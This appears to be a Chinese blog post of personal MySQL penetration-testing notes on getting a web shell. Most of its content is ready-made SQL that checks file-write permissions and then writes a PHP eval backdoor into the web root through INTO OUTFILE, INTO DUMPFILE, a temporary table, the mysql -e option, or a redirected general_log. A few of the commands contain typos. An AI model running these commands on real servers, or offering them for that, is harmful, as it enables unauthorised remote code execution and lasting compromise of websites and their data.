前言
随便记录一下笔记,方便查询.最近是想到什么就记什么.
渗透测试mysql
关于如何攻击mysql请直接看这篇>Mysql数据库渗透及漏洞利用总结写的很全
拿shell
1前提需要知道网站的真实物理路径
2查看是否允许导入导出
show variables like '%secure%'
secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹,就会报告如下错误:
RROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
另外,为了读取服务器上文件,在服务器主机上你必须有file的权限。否则报错:
ERROR 1045 (28000): Access denied for user
如果上述限制都满足的话,就可以开始了
outfile
select '<?php eval($_POST[xxx]) ?>' into outfile '/var/www/xx.php';
dumpfile
select '<?php eval($_POST[xx]) ?>' into dumpfile '/var/www/xx.php';
借助表
Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[xxx]) ?>');Select cmd from temp into out file '/var/www/xx.php';Drop TABLE IF EXISTS temp;
用-e参数
mysql -uuser -ppasswd -e "select '' into outfile '/var/www/xxx.php'"
利用general_log拿shell
如果导入导出被禁用了就可以用这个方法.前提是root
set global general_log=on;
set global general_log_file='/var/www/xxx.php';
select '<?php eval($_POST[jumbo]) ?>';
1587
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
